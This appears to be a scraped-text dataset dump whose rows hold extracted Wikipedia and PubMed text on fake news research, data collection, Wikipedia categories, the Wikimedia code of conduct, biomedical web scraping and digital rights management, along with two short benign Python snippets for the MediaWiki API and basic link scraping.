92 University of Michigan political scientist Brendan Nyhan criticized Facebook for not doing more to combat fake news amplification. 265 Indiana University computer science professor Filippo Menczer commented on measures by Google and Facebook to deny fraudulent sites revenue, saying it was a good step to reduce motivation for fraudsters. 266 Menczer's research team engaged in developing an online tool titled: Hoaxy — to see the pervasiveness of unconfirmed assertions as well as related debunking on the Internet. 267 Zeynep Tufekci wrote critically about Facebook's stance on fraudulent news sites, stating that fraudulent websites in North Macedonia profited handsomely off false stories about the 2016 U.S. election. 268 Tufecki wrote that Facebook's algorithms, and structure exacerbated the impact of echo chambers and increased fake news blight. 268 In 2016 Melissa Zimdars, associate professor of communications at Merrimack College, 269 created a handout for her Introduction to Mass Communication students titled "False, Misleading, Clickbait-y, and or Satirical 'News' Sources" and posted it on Google docs. 270 It was circulated on social media, and on 15 November 2016, the Los Angeles Times published the class handout under the title "Want to keep fake news out of your newsfeed? College professor creates list of sites to avoid". 271 Zimdars said that the list "wasn't intended to be widely distributed", and expressed concern that "people are taking it as this list of 'fake' sites, which is not its purpose". On 17 November 2016 Zimdars deleted the list. 272 On 3 January 2017, Zimdars replaced the original handout with a new list at the same URL. 273 The new list has removed most of the sites from the original handout, added many new sites, and greatly expanded the categories. Stanford University professors Sam Wineburg and Sarah McGrew authored a 2016 study analyzing students' ability to discern fraudulent news from factual. 274 275 The study took place over a year-long period of time, and involved a sample size of over 7,800 responses from university, secondary and middle school students in 12 states within the United States. 274 275 They were surprised at the consistency with which students thought fraudulent news reports were factual. 274 275 The study found 82% of students in middle school were unable to differentiate between an advertisement denoted as sponsored content from an actual news article. 276 The authors concluded the solution was to educate online media consumers to themselves behave like fact-checkers — and actively question the veracity of all sources. 274 275 277 A 2019 study in the journal Science, which examined dissemination of fake news articles on Facebook in the 2016 election, found that sharing of fake news articles on Facebook was "relatively rare", conservatives were more likely than liberals or moderates to share fake news, and there is a "strong age effect", whereby individuals over 65 are vastly more likely to share fake news than younger cohorts. 278 Another 2019 study in Science found, "fake news accounted for nearly 6% of all news consumption on Twitter , but it was heavily concentrated—only 1% of users were exposed to 80% of fake news, and 0.1% of users were responsible for sharing 80% of fake news. Interestingly, fake news was most concentrated among conservative voters. 279 Scientist Emily Willingham has proposed applying the scientific method to fake news analysis. 
280 She had previously written on the topic of differentiating science from pseudoscience, and proposed applying that logic to fake news. 280 She calls the recommended steps Observe, Question, Hypothesize, Analyze data, Draw conclusion, and Act on results. 280 Willingham suggested starting with the hypothesis "This is real news" and then forming a strong set of questions to attempt to disprove it. 280 These tests included checking the URL and the date of the article, evaluating reader bias and writer bias, double-checking the evidence, and verifying the sources cited. 280 University of Connecticut philosophy professor Michael P. Lynch said that a troubling number of individuals make determinations relying upon the most recent piece of information they've consumed. 31 He said the greater issue, however, was that fake news could make people less likely to believe news that really is true. 31 Lynch summed up the thought process of such individuals as: "...ignore the facts because nobody knows what's really true anyway." 31 In 2019, David Lazer and other researchers from Northeastern University, Harvard University, and the University at Buffalo analyzed engagement with a previously defined set of fake news sources on Twitter. They found that such engagement was highly concentrated both among a small number of websites and a small number of Twitter users. Five percent of the sources accounted for over fifty percent of exposures. Among users, 0.1 percent consumed eighty percent of the volume from fake news sources. 281 |
15 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_collection | Data collection or data gathering is the process of gathering and measuring information on targeted variables in an established system, which then enables one to answer relevant questions and evaluate outcomes. Data collection is a research component in all study fields, including physical and social sciences, humanities, 2 and business. While methods vary by discipline, the emphasis on ensuring accurate and honest collection remains the same. The goal for all data collection is to capture evidence that allows data analysis to lead to the formulation of credible answers to the questions that have been posed. Regardless of the field of or preference for defining data (quantitative or qualitative), accurate data collection is essential to maintain research integrity. The selection of appropriate data collection instruments (existing, modified, or newly developed) and delineated instructions for their correct use reduce the likelihood of errors. Data collection and validation consist of four steps when it involves taking a census and seven steps when it involves sampling. 3 A formal data collection process is necessary, as it ensures that the data gathered are both defined and accurate. This way, subsequent decisions based on arguments embodied in the findings are made using valid data. 4 The process provides both a baseline from which to measure and in certain cases an indication of what to improve. Data management platforms (DMP) are centralized storage and analytical systems for data, mainly used in marketing. DMPs exist to compile and transform large amounts of demand and supply data into discernible information. Marketers may want to receive and utilize first, second and third-party data.DMPs enable this, because they are the aggregate system of DSPs (demand side platform) and SSPs (supply side platform). DMPs are integral for optimizing and future advertising campaigns. The main reason for maintaining data integrity is to support the observation of errors in the data collection process. Those errors may be made intentionally (deliberate falsification) or non-intentionally (random or systematic errors). 5 There are two approaches that may protect data integrity and secure scientific validity of study results: 6 QA's focus is prevention, which is primarily a cost-effective activity to protect the integrity of data collection. Standardization of protocol, with comprehensive and detailed procedure descriptions for data collection, are central for prevention. The risk of failing to identify problems and errors in the research process is often caused by poorly written guidelines. Listed are several examples of such failures: There are serious concerns about the integrity of individual user data collected by cloud computing, because this data is transferred across countries that have different standards of protection for individual user data. 7 Information processing has advanced to the level where user data can now be used to predict what an individual is saying before they even speak. 8 Since QC actions occur during or after the data collection, all the details can be carefully documented. There is a necessity for a clearly defined communication structure as a precondition for establishing monitoring systems. 
An uncertain flow of information is undesirable, as a poorly organized communication structure leads to lax monitoring and can also limit the opportunities for detecting errors. Quality control is also responsible for identifying the actions needed to correct faulty data collection practices and to minimize such occurrences in the future. A team is less likely to recognize the need for these actions if its procedures are written vaguely and are not informed by feedback or training. Data collection problems that necessitate prompt action: |
16 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Help:Category | Categories are intended to group together pages on similar subjects. They are implemented by a MediaWiki feature that adds any page with a text like Category:XYZ in its wiki markup to the automated listing that is the category with name XYZ. Categories help readers to find, and navigate around, a subject area, to see pages sorted by title, and to thus find article relationships. Categories are normally found at the bottom of an article page. Clicking a category name brings up a category page listing the articles (or other pages) that have been added to that particular category. There may also be a section listing the subcategories of that category. The subcategorization feature makes it possible to organize categories into tree-like structures to aid navigation. The term category does refer to both the title of a category page—the category pagename—and the category itself. Keeping this in mind while reading about categorization, plus learning a category page layout is a worthwhile investment in research techniques. (See also the search box parameter "incategory".) The layout of a category page is mostly text, but see about displaying category trees below. The MediaWiki software maintains tables of categories, to which any editable page can be added. To add a page to a category, include Category:Category name or Category:Category name Sortkey in that page's wiki markup. The categories to which a page belongs appear in a box at the bottom of the page. A category is usually associated with a category page in the "Category: namespace. 1 A category page contains text that can be edited, like any other page, but when the page is displayed, the last part of what is displayed is an automatically generated list of all pages in that category, in the form of links. Other category pages which appear in this list are treated separately, as subcategories. A category page is any page in the Category namespace. They each act as a category, and are termed a "category". The category page has one section titled Subcategories listing other "categories", and one section titled Pages, listing pages as categorized (in other namespaces). New categories are created by creating a page in the Category namespace. A category page can be edited like any other page. However, when it is displayed, the editable part of the page is followed by automatically generated lists of pages belonging to the category, as follows: The items in the lists all link to the pages concerned; in the case of the images this applies both to the image itself and to the text below it (the name of the image). For the way in which the lists are ordered, see Sorting category pages below. The first and second lists are divided into sections, according to the first character of the sort key. These initial characters are displayed above the sections. To suppress these, make all sort keys start with a space. A category page can only display a limited number of items (currently 200). If more pages belong to the category, there will be a link to the next ones. The categories box for the category page appears at the bottom, in the same place as for other pages. This contains the categories to which the current category page has been added, i.e., its parent categories (the categories of which it is a subcategory). Add a category page to other categories in the normal way, using the Category:Category name or Category:Category name Sortkey syntax. 
A page becomes part of a category if the page's wiki markup contains a declaration for that category. A category declaration takes the form Category:Category name or Category:Category name Sortkey . The declaration must be processed, i.e. it will not work if it appears between nowiki ... nowiki or includeonly ... includeonly tags, or in a comment. The declaration may however come from a transcluded page; see Categories and templates below. A category name can be any string that would be a legitimate page title. If the category name begins with a lower-case letter, it will be capitalized. For initial lower-case letters, as in Category:macOS, see the technical restrictions page. On Wikipedia, it is customary to place category declarations at the end of the wiki markup, but before any stub templates (which themselves transclude categories) and interlanguage links. When a page has been added to one or more categories, a categories box appears at the bottom of the page (or possibly elsewhere, if a non-default skin is being used). This box contains a list of the categories the page belongs to, in the order in which the category declarations appear in the processed wiki markup. The category names are linked to the corresponding category pages. They appear as red links if the corresponding category page does not exist. If a user has enabled the HotCat gadget, the categories box will also provide links to quickly add, remove, or modify category declarations on the page, without having to edit the whole page. Hidden categories are not displayed, except as described below under Hiding categories. The following subsections are ordered from simple actions to more elaborate or rarer actions. To link to a category page without putting the current page in that category, precede the link with a colon: :Category:Category name . Such a link can be piped like a normal wikilink. (The cl template, and others listed on its documentation page, may sometimes be helpful.) Raw information about the members of a category, their sort keys and timestamps (time when last added to the category) can be obtained from the API, using a query of the form: Listings of up to 500 members are possible. If there are more members then the results will include text near the end like this: categorymembers cmcontinue "page NNNN TITLE" . This can be added to the previous one, without quotation marks, for the next page of members: ... cmcontinue page NNNN TITLE By default, a page is sorted under the first character of its name, without the namespace. English Wikipedia groups accented characters together with their unaccented version, so pages starting with , , , will be listed under heading A. Sorting is case-insensitive, so "ABC" comes after "Abacus". Unlike at Special:Allpages and Special:Prefixindex, a space is treated as a space (coming before all other characters), not as an underscore. The English Wikipedia has numerical sorting in categories. This means a page whose title begins with a number will be sorted according to the numeric value of the number (even if it is multiple digits). Thus "9 dogs", "25 dogs", and "112 dogs" will all appear under the "0 9" heading in numeric order. If the number includes a comma, space, or period, the sorting algorithm will only consider the part of the number before the separator. Each of the three lists (subcategories, pages, media files) is arranged in the order explained above (except that, in the subcategories list, the namespace indicator "Category: is not considered). 
If an item ought to be positioned within a list on the basis of an alternative name (sort key) for that item, then this can be specified in the category tag that places the item in the list: For example, to add an article called Albert Einstein to Category:1879 births and have the article sorted by "Einstein, Albert", you would type: Unlike a piped link (which uses the same syntax), the sort key itself is not displayed to readers. It affects only the order in which pages are listed on the category page. It is useful to document the system being used for sort keys on the category page. For guidelines about the use of sort keys on Wikipedia, see WP:SORTKEY. It is possible to set a default sort key which is different from PAGENAME by using the magic word DEFAULTSORT: : This is often used in biography articles, to make sure the subject is sorted by their last name: For example, on the Albert Einstein page, DEFAULTSORT:Einstein, Albert adds the sort key "Einstein, Albert" to all his categories, such as Category:1879 births. In the case of multiple default sort key tags, the last DEFAULTSORT on the final rendering of a page applies for all categories, regardless of the position of the category tags. This also means that a DEFAULTSORT tag included from a template is not effective if another DEFAULTSORT tag occurs later on the page, even if the later DEFAULTSORT tag is also "hidden" (included by another template). If a category is added inside ref ... ref then DEFAULTSORT may be ignored. In addition to browsing through hierarchies of categories, it is possible to use the search tool to find specific articles in specific categories. To search for articles in a specific category, type incategory:"CategoryName" in the search box. A pipe can be added to join the contents of one category with the contents of another. For example, enter to return all pages that belong to either (or both) of the categories, as here. Note that using search to find categories will not find articles which have been categorized using templates. This feature also doesn't return pages in subcategories. Special:Categories provides an alphabetic list of all categories, with the number of members of each; this number does not include the content of the subcategories, but it includes the subcategories themselves, i.e., each counting as one. The above list contains all categories that have members, regardless of whether they have corresponding category pages. To list all existing category pages (regardless of whether they have members), use Special:AllPages Category:. As described at mw:Help:Magic words, PAGESINCATEGORY:Example or PAGESINCAT:Example returns the number of pages in "Category:Example". Each subcategory counts as one page; pages in subcategories are not counted. The page Special:CategoryTree enables you to see the tree structure of a category (its subcategories, their subcategories and so on; the display of files and other member pages is optional). The CategoryTree extension can be used to display such a tree on any page. (This is sometimes done on the category page itself, if the category is split over multiple screens, to make all subcategories available on every screen.) The basic syntax is to display just the subcategory tree, and to display member pages as well. They will be indicated by italics. Dapete's category-visualizer vCat will render charts of the tree structure. You may also use Template:Category tree or Template:Category tree all, instead. 
Warning: Categories can be moved in the same way as an ordinary page; but a certain amount of cleanup may be necessary. A redirect is left at the old category name, and this is not a normal REDIRECT ... but a category redirect . Once all the pages have been moved out of the old category, it may be left as a category redirect or deleted. For categories entirely populated through templates (see above), modifying the templates enables all affected articles to be moved to another category, but with the refresh problem mentioned. Almost all category name changes are made pursuant to a consensus decision at Wikipedia:Categories for discussion. Do not create intercategory redirects other than with a category redirect template. See Wikipedia:Categories for discussion Redirecting categories for more on category redirects. When the magic word HIDDENCAT is placed on a category page, that category becomes hidden, meaning that it will not be displayed on the pages belonging to that category. On Wikipedia, the magic word is not normally used explicitly, but is applied through the hidden category template. The feature is mostly used to prevent project maintenance categories from showing up to ordinary readers on article pages. For users who are not logged in, hidden categories are displayed on category pages (whether as parent categories or subcategories). Hidden categories are displayed at the bottom of each page, after "Hidden categories: , for registered users: Hidden categories are automatically added to Category:Hidden categories. For guidelines on the hiding of categories on Wikipedia, see WP:HIDDENCAT. The most effective way of finding entries of a category is using the "What links here" tool on the category's main article. An easy way to find relevant articles for a new category or missing entries in an existing one is by finding the most relevant list and checking its entries. Sometimes categories are about things that are intersections of other categories for which the PetScan tool can be used. More relevant articles may also be found linked in a category's main article and the articles already featured in the category especially in their "See also" sections (if existent) and the automatically suggested "RELATED ARTICLES" below them. Furthermore, a category's superordinate categories often feature articles that should be subcategorized to the category. Other ways to find relevant articles include searching Wikipedia for the category's topic and searching the Web for the topic in quotes (with synonyms also in quotes and appended after an OR) and appending the word wiki or Wikipedia or site:Wikipedia.org to them. Templates are categorized the same way as articles, except that Category: Some-topic templates should be placed on the template's documentation page (or inside noinclude ... noinclude tags, if there is no documentation page), this is necessary to avoid categorizing pages by template inclusion (see below). A template can be used to add pages to a category, usually by placing the category link inside includeonly includeonly tags on the template (e.g. includeonly Category:category name includeonly ). When the template is transcluded into the page, the category link becomes active, and the page is added to the category page. This is useful for categories that have high turnover or many pages included, like cleanup categories. Changes to the template, however, may not be reflected immediately on the category page. 
When you edit an article to add a category tag directly, the list of category members is updated immediately when the page is saved. When a category link is contained in a template, however, this does not happen immediately: instead, whenever a template is edited, all the pages that transclude it are put into the job queue to be recached during periods of low server load. This means that, in busy periods, it may take hours or even days before individual pages are recached and they start to appear in the category list. Performing a null edit to a page will allow it to jump the queue and be immediately recached. To add the template itself to the category page as well, omit the "includeonly" tags. To add the template to a category without categorizing pages on which the template is transcluded, place the category declaration between noinclude ... noinclude tags, or add it to the template documentation page between includeonly includeonly (the latter allows recategorizing the template without editing it, which is helpful if it is protected, or so complicated that mere mortals hesitate to touch it). Parser functions can be used to make the transcluded categories, or the sort key used in them, dependent on other variables, notably PAGENAME. On Wikipedia it is not recommended that templates be used to populate ordinary content categories of articles. See Categorization using templates in the categorization guideline. Redirect pages can be categorized and there are conventions on how to do it. The redirect link must be first on the page. On a category page, redirects are listed in italics. For a category, the "Related Changes" feature, when applied to the corresponding category page, lists recent changes to the pages which are currently listed as belonging to a category. Where those pages are subcategories or image pages, only changes to their editable parts are listed. Notice that "Related Changes" does not show edits to pages that have been removed from the category. Also, "Related Changes" does not list recent changes to pages linked from the editable part of the category page (as it would normally, with a non-category page). If a workaround would be required, the links in question could be placed in a template and transcluded onto the category page. As usual unlike with watchlists recent changes to corresponding talk pages are not shown under "Related Changes". Pages one is watching are bolded on the list. This can help to find which pages in a given category one has on one's watchlist. The DynamicPageList (third-party) extension provides a list of last edits to the pages in a category, or optionally, just the list of pages; the simpler DynamicPageList (Wikimedia) is installed on Meta, Wikinews, Wikibooks and Wikiversity; the extension mw:Extension:DPLforum is installed on Wikia. Since 2016, additions and removals from categories are available via the "Category changes" filter on recent changes pages, including watchlists and Special:RecentChangesLinked. For example, category changes to articles in Category:Cannabis stubs can be found here. You can monitor additions and removals from specific categories by adding the categories to your watchlist and making sure the "Category changes" filter is active. You can view changes to categories in your watchlist by clicking here. Additional scripts with similar functionality are User:CategoryWatchlistBot and User:Ais523 catwatch. |
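The category-member listing described in the Help:Category entry above (an API query with action=query and list=categorymembers, returning up to 500 members per request plus a cmcontinue token when more remain) can be reproduced in Python with the requests library this notebook already uses. The following is a minimal sketch under those assumptions; the category name "Category:Fake news websites" is only a placeholder example, and error handling is kept deliberately thin.

import requests

API_URL = "https://en.wikipedia.org/w/api.php"

def list_category_members(category, limit=500):
    # Yield the titles of all pages in a category, following the
    # 'cmcontinue' token to page through results up to 500 at a time.
    params = {
        "action": "query",
        "list": "categorymembers",
        "cmtitle": category,      # e.g. "Category:Fake news websites" (placeholder)
        "cmlimit": limit,         # the API caps ordinary requests at 500 members
        "format": "json",
    }
    while True:
        data = requests.get(API_URL, params=params, timeout=10).json()
        for member in data["query"]["categorymembers"]:
            yield member["title"]
        # The 'continue' block is present only when more members remain
        if "continue" in data:
            params["cmcontinue"] = data["continue"]["cmcontinue"]
        else:
            break

# Example usage (placeholder category):
# for title in list_category_members("Category:Fake news websites"):
#     print(title)

Querying the API this way avoids scraping the rendered category pages, which, as noted in the entry above, display only a limited number of items (currently 200) per screen.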
17 | https://en.wikipedia.org/wiki/Web_scraping | https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Universal_Code_of_Conduct | It may not be circumvented, eroded, or ignored by Wikimedia Foundation officers or staff nor local policies of any Wikimedia project.Per resolution by the Foundation's Board, the Universal Code of Conduct (UCoC) applies to all Wikimedia projects and spaces as well as Foundation activities, including events it hosts and events it funds or supports with other resources. We believe in empowering as many people as possible to actively participate in Wikimedia projects and spaces, to reach our vision of a world in which everyone can share in the sum of all human knowledge. We believe our communities of contributors should be as diverse, inclusive, and accessible as possible. We want these communities to be positive, safe and healthy environments for anyone who joins (and wants to join) them. We are committed to ensuring that it remains so, including by embracing this Code of Conduct and revisiting for updates as needed. Also, we wish to protect our projects against those who damage or distort the content. In line with the Wikimedia mission, all who participate in Wikimedia projects and spaces will: This Universal Code of Conduct (UCoC) defines a minimum set of guidelines of expected and unacceptable behaviour. It applies to everyone who interacts and contributes to online and offline Wikimedia projects and spaces. This includes new and experienced contributors, functionaries within the projects, event organizers and participants, employees and board members of affiliates and employees and board members of the Wikimedia Foundation. It applies to all Wikimedia projects, technical spaces, in-person and virtual events, as well as the following instances: The Universal Code of Conduct provides a baseline of behaviour for collaboration on Wikimedia projects worldwide. Communities may add to this to develop policies that take account of local and cultural context, while maintaining the criteria listed here as a minimum standard. The Universal Code of Conduct applies equally to all Wikimedians without any exceptions. Actions that contradict the Universal Code of Conduct can result in sanctions. These may be imposed by designated functionaries (as appropriate in their local context) and or by the Wikimedia Foundation as the legal owner of the platforms. Every Wikimedian, whether they are a new or experienced editor, a community functionary, an affiliate or Wikimedia Foundation board member or employee, is responsible for their own behaviour. In all Wikimedia projects, spaces and events, behaviour will be founded in respect, civility, collegiality, solidarity and good citizenship. This applies to all contributors and participants in their interaction with all contributors and participants, without exceptions based on age, mental or physical disabilities, physical appearance, national, religious, ethnic and cultural background, caste, social class, language fluency, sexual orientation, gender identity, sex or career field. Nor will we make exceptions based on standing, skills or accomplishments in the Wikimedia projects or movement. We expect all Wikimedians to show respect for others. In communicating with people, whether in online or offline Wikimedia environments, we will treat each other with mutual respect. 
This includes but is not limited to: We strive towards the following behaviours: This includes but is not limited to: The Universal Code of Conduct aims to help community members identify situations of bad behaviour. The following behaviours are considered unacceptable within the Wikimedia movement: This includes any behaviour intended primarily to intimidate, outrage or upset a person, or any behaviour where this would reasonably be considered the most likely main outcome. Behaviour can be considered harassment if it is beyond what a reasonable person would be expected to tolerate in a global, intercultural environment. Harassment often takes the form of emotional abuse, especially towards people who are in a vulnerable position, and may include contacting workplaces or friends and family members in an effort to intimidate or embarrass. In some cases, behaviour that would not rise to the level of harassment in a single case can become harassment through repetition. Harassment includes but is not limited to: Abuse occurs when someone in a real or perceived position of power, privilege, or influence engages in disrespectful, cruel, and or violent behaviour towards other people. In Wikimedia environments, it may take the form of verbal or psychological abuse and may overlap with harassment. Deliberately introducing biased, false, inaccurate or inappropriate content, or hindering, impeding or otherwise hampering the creation (and or maintenance) of content. This includes but is not limited to: |
18 | https://en.wikipedia.org/wiki/Data_scraping | https://pubmed.ncbi.nlm.nih.gov/23632294 | Web services are the de facto standard in biomedical data integration. However, there are data integration scenarios that cannot be fully covered by Web services. A number of Web databases and tools do not support Web services, and existing Web services do not cover for all possible user data demands. As a consequence, Web data scraping, one of the oldest techniques for extracting Web contents, is still in position to offer a valid and valuable service to a wide range of bioinformatics applications, ranging from simple extraction robots to online meta-servers. This article reviews existing scraping frameworks and tools, identifying their strengths and limitations in terms of extraction capabilities. The main focus is set on showing how straightforward it is today to set up a data scraping pipeline, with minimal programming effort, and answer a number of practical needs. For exemplification purposes, we introduce a biomedical data extraction scenario where the desired data sources, well-known in clinical microbiology and similar domains, do not offer programmatic interfaces yet. Moreover, we describe the operation of WhichGenes and PathJam, two bioinformatics meta-servers that use scraping as means to cope with gene set enrichment analysis. Keywords: Web scraping; data integration; database interfaces; interoperability. © The Author 2013. Published by Oxford University Press. For Permissions, please email: journals.permissions@oup.com. |
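The abstract's point that a basic scraping pipeline needs very little code can be illustrated with the libraries this notebook already imports; the URL and the tags chosen below are placeholders for illustration, not anything taken from the paper.

import requests
import pandas as pd
from bs4 import BeautifulSoup

def scrape_links(url):
    # Fetch a page, parse it, and collect link text and targets into a DataFrame.
    response = requests.get(url, timeout=10)
    response.raise_for_status()
    soup = BeautifulSoup(response.text, "html5lib")
    rows = [{"text": a.get_text(strip=True), "href": a.get("href")}
            for a in soup.find_all("a", href=True)]
    return pd.DataFrame(rows)

# Placeholder usage:
# df = scrape_links("https://example.org/some-listing")
# print(df.head())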
19 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Digital_rights_management | Digital rights management (DRM) is the management of legal access to digital content. Various tools or technological protection measures (TPM), 1 such as access control technologies, can restrict the use of proprietary hardware and copyrighted works. 2 DRM technologies govern the use, modification and distribution of copyrighted works (e.g. software, multimedia content) and of systems that enforce these policies within devices. 3 DRM technologies include licensing agreements 4 and encryption. 5 Laws in many countries criminalize the circumvention of DRM, communication about such circumvention, and the creation and distribution of tools used for such circumvention. Such laws are part of the United States' Digital Millennium Copyright Act (DMCA), 6 and the European Union's Information Society Directive 7 with the French DADVSI an example of a member state of the European Union implementing that directive. 8 Copyright holders argue that DRM technologies are necessary to protect intellectual property, just as physical locks prevent personal property from theft. 1 For examples, they can help the copyright holders for maintaining artistic controls, 9 and supporting licenses' modalities such as rentals. 10 Industrial users (i.e. industries) have expanded the use of DRM technologies to various hardware products, such as Keurig's coffeemakers, 11 12 Philips' light bulbs, 13 14 mobile device power chargers, 15 16 17 and John Deere's tractors. 18 For instance, tractor companies try to prevent farmers from making repairs via DRM. 19 20 DRM is controversial. There is an absence of evidence about the DRM capability in preventing copyright infringement, some complaints by legitimate customers for caused inconveniences, and a suspicion of stifling innovation and competition. 21 Furthermore, works can become permanently inaccessible if the DRM scheme changes or if a required service is discontinued. 22 DRM technologies have been criticized for restricting individuals from copying or using the content legally, such as by fair use or by making backup copies. DRM is in common use by the entertainment industry (e.g., audio and video publishers). 23 Many online stores such as OverDrive use DRM technologies, as do cable and satellite service operators. Apple removed DRM technology from iTunes around 2009. 24 Typical DRM also prevents lending materials out through a library, or accessing works in the public domain. 1 The rise of digital media and analog-to-digital conversion technologies has increased the concerns of copyright-owners, particularly within the music and video industries. While analog media inevitably lose quality with each copy generation and during normal use, digital media files may be duplicated without limit with no degradation. Digital devices make it convenient for consumers to convert (rip) media originally in a physical, analog or broadcast form into a digital form for portability or later use. Combined with the Internet and file-sharing tools, made unauthorized distribution of copyrighted content (digital piracy) much easier. DRM became a major concern with the growth of the Internet in the 1990s, as piracy crushed CD sales and online video became popular. 
It peaked in the early 2000s as various countries attempted to respond with legislation and regulations and dissipated in the 2010s as social media and streaming services largely replaced piracy and content providers elaborated next-generation business models. In 1983, the Software Service System (SSS) devised by the Japanese engineer Ryuichi Moriya was the first example of DRM technology. It was subsequently refined under the name superdistribution. The SSS was based on encryption, with specialized hardware that controlled decryption and enabled payments to be sent to the copyright holder. The underlying principle was that the physical distribution of encrypted digital products should be completely unrestricted and that users of those products would be encouraged to do so. 25 An early DRM protection method for computer and Nintendo Entertainment System games was when the game would pause and prompt the player to look up a certain page in a booklet or manual that came with the game; if the player lacked access to the material, they would not be able to continue. An early example of a DRM system is the Content Scramble System (CSS) employed by the DVD Forum on DVD movies. CSS uses an encryption algorithm to encrypt content on the DVD disc. Manufacturers of DVD players must license this technology and implement it in their devices so that they can decrypt the content. The CSS license agreement includes restrictions on how the DVD content is played, including what outputs are permitted and how such permitted outputs are made available. This keeps the encryption intact as the content is displayed. citation needed In May 1998, the Digital Millennium Copyright Act (DMCA) passed as an amendment to US copyright law. It had controversial (possibly unintended) implications. Russian programmer Dmitry Sklyarov was arrested for alleged DMCA infringement after a presentation at DEF CON. The DMCA has been cited as chilling to legitimate users; 26 such as security consultants including Niels Ferguson, who declined to publish vulnerabilities he discovered in Intel's secure-computing scheme due to fear of arrest under DMCA; and blind or visually impaired users of screen readers or other assistive technologies. 27 In 1999, Jon Lech Johansen released DeCSS, which allowed a CSS-encrypted DVD to play on a computer running Linux, at a time when no compliant DVD player for Linux had yet been created. The legality of DeCSS is questionable: one of its authors was sued, and reproduction of the keys themselves is subject to restrictions as illegal numbers. 28 More modern examples include ADEPT, FairPlay, Advanced Access Content System. The World Intellectual Property Organization Copyright Treaty (WCT) was passed in 1996. The US Digital Millennium Copyright Act (DMCA), was passed in 1998. The European Union enacted the Information Society Directive. In 2006, the lower house of the French parliament adopted such legislation as part of the controversial DADVSI law, but added that protected DRM techniques should be made interoperable, a move which caused widespread controversy in the United States. The Tribunal de grande instance de Paris concluded in 2006, that the complete blocking of any possibilities of making private copies was an impermissible behaviour under French copyright law. The broadcast flag concept was developed by Fox Broadcasting in 2001, and was supported by the MPAA and the U.S. Federal Communications Commission (FCC). 
A ruling in May 2005 by a United States courts of appeals held that the FCC lacked authority to impose it on the US TV industry. It required that all HDTVs obey a stream specification determining whether a stream can be recorded. This could block instances of fair use, such as time-shifting. It achieved more success elsewhere when it was adopted by the Digital Video Broadcasting Project (DVB), a consortium of about 250 broadcasters, manufacturers, network operators, software developers, and regulatory bodies from about 35 countries involved in attempting to develop new digital TV standards. In January 2001, the Workshop on Digital Rights Management of the World Wide Web Consortium was held. 29 On 22 May 2001, the European Union passed the Information Society Directive, with copyright protections. In 2003, the European Committee for Standardization Information Society Standardization System (CEN ISSS) DRM Report was published. 30 In 2004, the Consultation process of the European Commission, and the DG Internal Market, on the Communication COM(2004)261 by the European Commission on "Management of Copyright and Related Rights" closed. 31 In 2005, DRM Workshops of Directorate-General for Information Society and Media (European Commission), and the work of the High Level Group on DRM were held. 32 In 2005, Sony BMG installed DRM software on users' computers without clearly notifying the user or requiring confirmation. Among other things, the software included a rootkit, which created a security vulnerability. When the nature of the software was made public much later, Sony BMG initially minimized the significance of the vulnerabilities, but eventually recalled millions of CDs, and made several attempts to patch the software to remove the rootkit. Class action lawsuits were filed, which were ultimately settled by agreements to provide affected consumers with a cash payout or album downloads free of DRM. 33 Microsoft's media player Zune released in 2006 did not support content that used Microsoft's PlaysForSure DRM scheme. 34 Windows Media DRM, reads instructions from media files in a rights management language that states what the user may do with the media. 35 Later versions of Windows Media DRM implemented music subscription services that make downloaded files unplayable after subscriptions are cancelled, along with the ability for a regional lockout. 36 Tools like FairUse4WM strip Windows Media of DRM restrictions. 37 The Gowers Review of Intellectual Property by the British Government from Andrew Gowers was published in 2006 with recommendations regarding copyright terms, exceptions, orphaned works, and copyright enforcement. DVB (DVB-CPCM) is an updated variant of the broadcast flag. The technical specification was submitted to European governments in March 2007. As with much DRM, the CPCM system is intended to control use of copyrighted material by the end-user, at the direction of the copyright holder. According to Ren Bucholz of the Electronic Frontier Foundation (EFF), "You won't even know ahead of time whether and how you will be able to record and make use of particular programs or devices". 38 The normative sections were approved for publication by the DVB Steering Board, and formalized by ETSI as a formal European Standard (TS 102 825 X) where X refers to the Part number. Nobody has yet stepped forward to provide a Compliance and Robustness regime for the standard, so it is not presently possible to fully implement a system, as no supplier of device certificates has emerged. 
In December 2006, the industrial-grade Advanced Access Content System (AACS) for HD DVD and Blu-ray Discs, a process key was published by hackers, which enabled unrestricted access to AACS-protected content. 39 40 In January 2007, EMI stopped publishing audio CDs with DRM, stating that "the costs of DRM do not measure up to the results. 41 In March, Musicload.de, one of Europe's largest internet music retailers, announced their position strongly against DRM. In an open letter, Musicload stated that three out of every four calls to their customer support phone service are as a result of consumer frustration with DRM. 42 Apple Inc. made music DRM-free after April 2007 43 and labeled all music as "DRM-Free" after 2008. 44 Other works sold on iTunes such as apps, audiobooks, movies, and TV shows are protected by DRM. 45 A notable DRM failure happened in November 2007, when videos purchased from Major League Baseball prior to 2006 became unplayable due to a change to the servers that validate the licenses. 46 In 2007, the European Parliament supported the EU's direction on copyright protection. Asus released a soundcard which features a function called "Analog Loopback Transformation" to bypass the restrictions of DRM. This feature allows the user to record DRM-restricted audio via the soundcard's built-in analog I O connection. 47 48 Digital distributor GOG.com (formerly Good Old Games) specializes in PC video games and has a strict non-DRM policy. 49 Baen Books and O'Reilly Media, dropped DRM prior to 2012, when Tor Books, a major publisher of science fiction and fantasy books, first sold DRM-free e-books. 50 The Axmedis project completed in 2008. It was a European Commission Integrated Project of the FP6, has as its main goal automating content production, copy protection, and distribution, to reduce the related costs, and to support DRM at both B2B and B2C areas, harmonizing them. The INDICARE project was a dialogue on consumer acceptability of DRM solutions in Europe that completed in 2008. In mid 2008, the Windows version of Mass Effect marked the start of a wave of titles primarily making use of SecuROM for DRM and requiring authentication with a server. The use of the DRM scheme in 2008's Spore led to protests, resulting in searches for an unlicensed version. This backlash against the activation limit led Spore to become the most pirated game in 2008, topping the top 10 list compiled by TorrentFreak. 51 52 However, Tweakguides concluded that DRM does not appear to increase video game piracy, noting that other games on the list, such as Call of Duty 4 and Assassin's Creed, use DRM without limits or online activation. Additionally, other video games that use DRM, such as BioShock, Crysis Warhead, and Mass Effect, do not appear on the list. 53 Many mainstream publishers continued to rely on online DRM throughout the later half of 2008 and early 2009, including Electronic Arts, Ubisoft, Valve, and Atari, The Sims 3 being a notable exception in the case of Electronic Arts. 54 Ubisoft broke with the tendency to use online 